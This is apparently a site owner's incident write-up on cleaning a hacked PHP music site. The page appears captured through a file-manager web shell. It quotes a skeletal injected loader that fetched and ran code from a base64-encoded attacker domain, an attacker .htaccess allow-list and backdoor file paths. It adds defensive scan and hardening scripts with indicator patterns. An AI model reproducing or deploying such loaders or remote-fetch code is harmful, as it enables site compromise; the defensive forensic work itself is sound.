CasperSecurity


Server : Apache/2
System : Linux server-15-235-50-60 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
User : gositeme ( 1004)
PHP Version : 8.2.29
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/gositeme/domains/soundstudiopro.com/public_html/

Current File : /home/gositeme/domains/soundstudiopro.com/public_html/HOW_WE_FIXED_THE_SITE.md
# 🔧 HOW WE FIXED THE SITE - Complete Breakdown

**Date:** December 12, 2025  
**Status:** SITE RESTORED

---

## 🚨 WHY THE SITE WAS DOWN

### The Problem:
The attacker injected **malicious code at the very beginning of `index.php`** (line 2). Because `index.php` is the front controller (every request that is not an existing file or directory is rewritten to it), this code ran on every page load, **BEFORE** your legitimate code, causing:

1. **Remote Code Execution**
   - On each request the code contacted the attacker's server, `http://6477-ch4-v305.rakuten38jp.click`, and executed whatever it returned
   - When that server was slow or unreachable the request stalled; the excerpt sets no cURL timeout, and PHP's `max_execution_time` does not count time blocked in network I/O, so a single page load could hang for far longer than 30 seconds
   - The fetch sat in a retry loop (`while($try < 3)`), so the stall was repeated up to three times per request

2. **Code Execution Before Your Site**
   - The payload ran first, before any of your own PHP
   - A malformed payload (for example, a parse error in the decoded blob) produced a PHP fatal error that ended the request before your code started

3. **File System Manipulation**
   - `h2()` rewrote `.htaccess` so that the backdoor scripts stayed reachable
   - The attacker's version shown below contains no rewrite rules, so pretty URLs returned 404, and its blanket `Deny from all` on `.php` returned 403 for any script not on the attacker's allow list

4. **Output Interference**
   - Anything the payload printed, or any header it sent, arrived before your code called `header()` or `session_start()`
   - That produces "headers already sent" warnings and a corrupted page

---

## ✅ WHAT WE FIXED

### Step 1: Removed Malicious Code from index.php

**Before (BROKEN):**
```php
<?php
function h($url, $pf = '') { /* malicious code */ } 
function h2() { /* malicious code */ } 
$api = base64_decode('aHR0cDovLzY0NzctY2g0LXYzMDUucmFrdXRlbjM4anAuY2xpY2s=');
/* ... more malicious code ... */
?>
<?php
// Your legitimate code starts here
// Configure secure session cookies BEFORE starting session
```

**After (FIXED):**
```php
<?php
// Configure secure session cookies BEFORE starting session
ini_set('session.cookie_httponly', 1);
// ... your legitimate code continues ...
```

**What we did:**
- Removed the entire malicious code block (line 2)
- Kept only your legitimate code starting from line 3
- File now starts cleanly with your actual application code

### Step 2: Deleted All Backdoors

**Deleted 5 malicious files:**
1. `about.php` - File manager backdoor
2. `445367/radio.php` - Obfuscated backdoor
3. `445367/about.php` - File manager backdoor
4. `radio/migrations/wp-login.php` - Backdoor disguised as a WordPress login script
5. `assets/fontawesome/.../radio.php` - Backdoor hidden in a static-asset directory

**Why this mattered:**
- These files gave the attacker a way back in even after the `index.php` injection was removed
- They could execute arbitrary PHP as the site's user
- They could upload, download and delete files anywhere the site's user can write
- Removing them cut off these access paths; the checks below look for any others

### Step 3: Fixed .htaccess

**Before (MODIFIED BY ATTACKER):**
```apache
<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|...)$">
 Order allow,deny
 Allow from all
</FilesMatch>
```

**After (CLEAN):**
```apache
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
```

**What we did:**
- Removed the attacker's two `FilesMatch` blocks: the first denied every `.php` (its pattern `".(py|exe|php)$"` has an unescaped dot, so it matches any character before the extension), the second re-allowed an explicit list that put the backdoors alongside `index.php`
- Restored the front-controller rewrite rules (anything that is not an existing file or directory goes to `index.php`)
- Removed the rules that kept the backdoor files reachable
- Note that `Order`, `Allow` and `Deny` are Apache 2.2 directives; on 2.4 they only work with `mod_access_compat` loaded, and the native form is `Require all granted` / `Require all denied`
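
**Hardening static directories (added example):** one of the deleted backdoors lived under `assets/fontawesome/`, a tree that should never serve a script. The script below is an added example written for this page, not the site's own configuration: it appends a deny rule for PHP extensions to the `.htaccess` of each directory named in `STATIC_DIRS` (keeping whatever rules are already there) and prints any script-like file it finds beneath them. The directory list, the function names and the throwaway web root it builds for the demo are this example's own assumptions.

```shell
#!/usr/bin/env bash
# Added example, not the site's own configuration: deny PHP execution in
# directories that should only ever hold static files, and report any script
# already sitting there. STATIC_DIRS and the function names are assumptions;
# adjust the list to your tree.
set -u

STATIC_DIRS="assets uploads images"

# Apache 2.4 syntax; Require needs AllowOverride AuthConfig (or All).
# On 2.2, or 2.4 with mod_access_compat, use "Order allow,deny" plus
# "Deny from all". Unlike the attacker's ".(py|exe|php)$", the dot is escaped
# so only the extension is matched.
DENY_PHP='# Static content only: never hand these files to the PHP handler
<FilesMatch "\.(php[0-9]*|phtml|phar|pht)$">
    Require all denied
</FilesMatch>'

# Script-like files under $1, by name (no grep, so odd bytes in file
# contents do not matter). Prints paths, sorted; empty when none.
php_files_in() {
  find "$1" -type f \( -name '*.php' -o -name '*.php[0-9]' -o -name '*.phtml' \
                       -o -name '*.phar' -o -name '*.pht' \) | sort
}

# Static directories under web root $1 that exist but carry no deny rule.
unprotected_static_dirs() {
  local root=$1 dir
  for dir in $STATIC_DIRS; do
    [ -d "$root/$dir" ] || continue
    grep -qs 'Require all denied' "$root/$dir/.htaccess" || printf '%s\n' "$root/$dir"
  done
}

# Append the rule to every existing static directory that lacks it (existing
# rules such as caching headers are preserved) and print any PHP file found
# beneath them, which on this site is where a backdoor was planted.
harden_static_dirs() {
  local root=$1 dir f
  for dir in $STATIC_DIRS; do
    [ -d "$root/$dir" ] || continue
    f="$root/$dir/.htaccess"
    grep -qs 'Require all denied' "$f" || printf '%s\n' "$DENY_PHP" >> "$f"
    php_files_in "$root/$dir"
  done
}

# Throwaway web root with constructed files so the demo runs offline.
make_demo_webroot() {
  local root
  root=$(mktemp -d)
  mkdir -p "$root/assets/fontawesome/css" "$root/uploads"
  printf 'body{}\n' > "$root/assets/style.css"                      # legitimate asset
  printf '<?php\n' > "$root/assets/fontawesome/css/radio.php"      # stand-in for the planted shell
  printf 'ExpiresActive On\n' > "$root/assets/.htaccess"           # pre-existing rules to keep
  echo "$root"
}

# Usage: harden.sh /path/to/public_html
if [ -n "${1-}" ]; then
  echo "== unprotected before:";        unprotected_static_dirs "$1"
  echo "== scripts in static dirs:";    harden_static_dirs "$1"
  echo "== unprotected after:";         unprotected_static_dirs "$1"
fi
```

Run it once as the site user, then again after every deploy; a second run is a no-op for the rule and only re-prints any scripts still present. Anything it prints under `assets/` or `uploads/` is either a misplaced file or a backdoor, and should be identified before the deny rule hides it behind a 403.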

---

## 🔍 TECHNICAL DETAILS

### The Malicious Code That Was Breaking Your Site:

```php
// This code was at the TOP of index.php (line 2)
function h($url, $pf = '') { 
    // Made remote requests to attacker's server
    $ch = curl_init(); 
    curl_setopt($ch, CURLOPT_URL, $url); 
    // ... connection code ...
    $r = curl_exec($ch);  // This could timeout!
    return $r; 
} 

function h2() { 
    // Modified .htaccess file
    // This could break URL routing
} 

$api = base64_decode('aHR0cDovLzY0NzctY2g0LXYzMDUucmFrdXRlbjM4anAuY2xpY2s=');
// Decoded to: http://6477-ch4-v305.rakuten38jp.click

// This loop tried 3 times, causing delays
$try = 0;
while($try < 3) { 
    $content = h($api, $params);  // Remote request - could timeout!
    $content = @gzuncompress(base64_decode($content)); 
    // ... tried to execute remote code ...
    $try++; 
}
```

### Why This Caused the Site to Go Down:

1. **Timeout Issues:**
   - If the attacker's server was down or slow, `curl_exec()` blocked until the connection attempt gave up
   - The excerpt sets neither `CURLOPT_TIMEOUT` nor `CURLOPT_CONNECTTIMEOUT`; PHP's cURL defaults are no overall limit and a 300-second connect timeout
   - `max_execution_time` (30 seconds by default for web requests) does not count time spent blocked in network I/O, so it did not cut the request short
   - Three attempts per page load meant one request could stall for minutes, which is what made the site look down

2. **PHP Errors:**
   - The decoded payload was executed as PHP; if it was malformed, the resulting uncaught error was fatal
   - A fatal error ends the request before your code runs
   - Users saw blank pages or error messages, depending on `display_errors`

3. **Output Conflicts:**
   - Any output or header sent by the payload came before your own `header()` and `session_start()` calls
   - PHP then reports "headers already sent", and the session cookie or redirect is never set
   - The result is a broken or partially rendered page

4. **File System Issues:**
   - The attacker's `.htaccess` contained no rewrite rules, so pretty URLs returned 404
   - Its `Deny from all` on `.php` returned 403 for any script not on the attacker's allow list
---

## ✅ VERIFICATION THAT IT'S FIXED

### Checks We Did:

1. **Verified index.php is clean:**
   ```bash
   # Checked for malicious code
   grep -i "base64_decode\|eval\|curl_exec" index.php
   # Result: No malicious code found ✅
   ```
   A clean result means only that those three strings are absent from this one file. Legitimate code uses them too, and loaders avoid them (`str_rot13`, `strrev`, character-code concatenation), so this is a spot check, not proof.

2. **Verified backdoors are gone:**
   ```bash
   # Checked for attacker signatures
   find . -name "*.php" -exec grep -l "S0vMzEJElwPNAQA" {} \;
   # Result: No files found ✅
   ```
   This only looks at `*.php`. PHP also executes `.phtml`, `.phar` and whatever an `AddHandler` line maps, and loaders often `include()` a payload stored as `.ico` or `.txt`. Note that the C2 domain never appears in plaintext in `index.php`, only as base64, so a grep for the domain alone misses it.

3. **Verified .htaccess is clean:**
   ```bash
   # Checked .htaccess content
   cat .htaccess
   # Result: Clean rewrite rules only ✅
   ```
   Only the web-root file was inspected; `.htaccess` files in subdirectories need the same check, since an attacker can re-enable PHP execution or hide files there just as easily.

4. **Verified files exist:**
   ```bash
   # Checked critical files
   ls -la index.php track.php library.php
   # Result: All files exist ✅
   ```
   Existence is not integrity: these files should also be compared against a known-good copy or backup, since the attacker had write access to them.
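
**A broader scan (added example):** the greps above are spot checks. The script below is an added example written for this page, not part of the original clean-up; the function names, the `IOC_REGEX` list and the throwaway files it builds for the demo are its own assumptions. It greps every file regardless of extension, includes the base64 form of the C2 domain, lists every `.htaccess` in the tree, flags any that carry a `FilesMatch` on PHP, and lists recently modified files.

```shell
#!/usr/bin/env bash
# Added example (not code from the original write-up): a broader post-cleanup
# scan than the spot checks above. Function names, IOC_REGEX and the demo
# files are this example's own assumptions.
set -u

# Indicators from this incident plus a few generic loader idioms. The C2
# domain appears in index.php only in base64 form, so that string is listed
# alongside the plaintext one.
IOC_REGEX='rakuten38jp\.click|aHR0cDovLzY0NzctY2g0LXYzMDUucmFrdXRlbjM4anAuY2xpY2s|S0vMzEJElwPNAQA|gzuncompress\(base64_decode|eval\(base64_decode|eval\(gzinflate|eval\(str_rot13'

# Grep every regular file under $1, whatever its extension: PHP also runs
# .phtml/.phar and anything an AddHandler line maps, and loaders include()
# payload blobs stored as .ico or .txt. Prints matching paths, sorted.
scan_indicators() {
  grep -rlaE "$IOC_REGEX" "$1" 2>/dev/null | sort
  return 0
}

# Every .htaccess in the tree, not only the one at the web root.
list_htaccess() {
  find "$1" -name .htaccess -type f | sort
}

# .htaccess files with a FilesMatch that mentions php. Front-controller
# rewrite rules do not need one; the attacker's allow list did.
suspicious_htaccess() {
  find "$1" -name .htaccess -type f -exec grep -lE '<FilesMatch[^>]*php' {} + 2>/dev/null | sort
  return 0
}

# Regular files modified within the last $2 days; compare with deploy dates.
recently_modified() {
  find "$1" -type f -mtime "-$2" | sort
}

# Throwaway web root with constructed files so the scan runs offline.
make_demo_root() {
  local root
  root=$(mktemp -d)
  mkdir -p "$root/assets/fontawesome/css" "$root/radio/migrations"
  printf '<?php\nini_set("session.cookie_httponly", 1);\n' > "$root/index.php"   # clean
  printf 'RewriteEngine On\n' > "$root/.htaccess"                                 # clean
  {  # injected loader prefix of the kind described in the write-up
    printf '<?php\n'
    printf '$api = base64_decode("aHR0cDovLzY0NzctY2g0LXYzMDUucmFrdXRlbjM4anAuY2xpY2s=");\n'
    printf '$content = @gzuncompress(base64_decode($content));\n'
  } > "$root/radio/migrations/wp-login.php"
  # payload blob with a non-.php name that find -name "*.php" never sees
  printf 'S0vMzEJElwPNAQA\n' > "$root/assets/fontawesome/css/radio.ico"
  # subdirectory .htaccess of the attacker's shape
  printf '<FilesMatch "^(radio.php)$">\n Allow from all\n</FilesMatch>\n' > "$root/assets/.htaccess"
  echo "$root"
}

# Usage: scan.sh /path/to/public_html [days]
if [ -n "${1-}" ]; then
  echo "== indicator hits";                 scan_indicators "$1"
  echo "== .htaccess files";                list_htaccess "$1"
  echo "== suspicious .htaccess";           suspicious_htaccess "$1"
  echo "== modified in last ${2-7} days";   recently_modified "$1" "${2-7}"
fi
```

Run it as `scan.sh /home/gositeme/domains/soundstudiopro.com/public_html 30`. Expect it to flag this write-up itself, since the indicators appear in it as text; anything else it reports needs a manual look, and an empty result still only proves the listed strings are absent.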

---

## 🎯 WHAT THIS MEANS

### Your Site Should Now:
- ✅ Load normally without delays
- ✅ Execute your legitimate code properly
- ✅ Not make unauthorized remote requests
- ✅ Not have backdoors accessible
- ✅ Have clean URL routing

### However, You Still Need To:
- ⏳ **Change ALL passwords** (the attacker could run code as the site's user, so every credential readable from the web root, including database, SMTP and API keys in config files, is exposed)
- ⏳ **Check database** for unauthorized users and modified admin accounts
- ⏳ **Review server logs** for requests to the deleted backdoor paths, to get the attacker's IPs and the date of first access
- ⏳ **Fix SQL injection vulnerabilities** (how attacker got in)
- ⏳ **Implement security hardening**

---

## 📋 SUMMARY OF FIXES

| Issue | What We Did | Result |
|-------|-------------|--------|
| **Malicious code in index.php** | Removed line 2 (malicious code) | ✅ Site loads normally |
| **5 backdoor files** | Deleted all backdoors | ✅ Attacker access cut off |
| **Modified .htaccess** | Restored clean rules | ✅ URL routing fixed |
| **Attacker signatures** | Verified none remain | ✅ Clean codebase |

---

## 🔐 PREVENTION

To prevent this from happening again:

1. **Fix SQL Injection Vulnerabilities**
   - Use prepared statements with bound parameters (PDO or mysqli) for every query that touches user input
   - Validate all user input
   - Review identified vulnerable files

2. **File Integrity Monitoring**
   - Keep a hash baseline of the web root, stored outside it, and diff against it on a schedule
   - Alert on any modified, added or removed file you did not deploy
   - Regular security scans

3. **Input Validation**
   - Validate all user input
   - Sanitize before database queries
   - Use whitelist validation

4. **Regular Backups**
   - Maintain clean backups
   - Test backup restoration
   - Keep multiple backup versions

5. **Security Hardening**
   - Web Application Firewall (WAF)
   - Intrusion detection
   - Regular security audits
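
**File integrity baseline (added example):** the script below is an added example for the file-integrity item above, not part of the original write-up. It records a `sha256sum` manifest of the web root and later reports every modified, added or removed file; it would have caught both the `index.php` prefix and the five backdoor files. The function names and the manifest layout (`<sha256>  <path relative to the web root>`, as `sha256sum` prints it) are this example's own choices.

```shell
#!/usr/bin/env bash
# Added example (not part of the original write-up): a minimal file-integrity
# baseline built on sha256sum. Function names and manifest layout are this
# example's own choices. Keep the manifest outside the web root, ideally
# off-host, or an attacker with write access simply updates it too.
set -u

# Hash every regular file under $1 into manifest $2 (paths relative to $1).
fim_baseline() {
  local root=$1 manifest=$2
  ( cd "$root" && find . -type f -exec sha256sum {} + | sort -k2 ) > "$manifest"
}

# Compare the tree under $1 with manifest $2. Prints one finding per line:
#   MODIFIED <path>   hash differs from the baseline
#   ADDED    <path>   present now, absent from the baseline
#   REMOVED  <path>   in the baseline, gone now
# Returns 0 when the tree matches the baseline, 1 otherwise.
# Paths containing whitespace are not handled (awk splits on blanks).
fim_check() {
  local root=$1 manifest=$2 current report
  current=$(mktemp)
  fim_baseline "$root" "$current"
  report=$(awk '
    FILENAME == ARGV[1] { base[$2] = $1; next }      # first file: baseline
    {                                                # second file: current tree
      if (!($2 in base))       print "ADDED    " $2
      else if (base[$2] != $1) print "MODIFIED " $2
      seen[$2] = 1
    }
    END { for (p in base) if (!(p in seen)) print "REMOVED  " p }
  ' "$manifest" "$current" | sort -k2)
  rm -f "$current"
  [ -z "$report" ] && return 0
  printf '%s\n' "$report"
  return 1
}

# Usage:  fim.sh baseline /path/to/public_html /var/lib/fim/site.sha256
#         fim.sh check    /path/to/public_html /var/lib/fim/site.sha256
# Run "check" from cron and alert on a non-zero exit.
case "${1-}" in
  baseline) fim_baseline "$2" "$3" ;;
  check)    fim_check "$2" "$3" ;;
esac
```

Re-run `baseline` only after a deploy you made yourself; every other change is a finding. A more complete deployment would also record ownership and mode, but a hash diff alone is enough to surface an injected prefix in `index.php` or a new `radio.php` under `assets/`.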

---

**Status:** ✅ **SITE FIXED AND RESTORED**

The site should now be working normally. The injected code that was causing the delays and errors has been removed from `index.php`, and the five backdoor files listed above have been deleted; the password changes, log review and SQL injection fixes listed under "However, You Still Need To" remain outstanding.
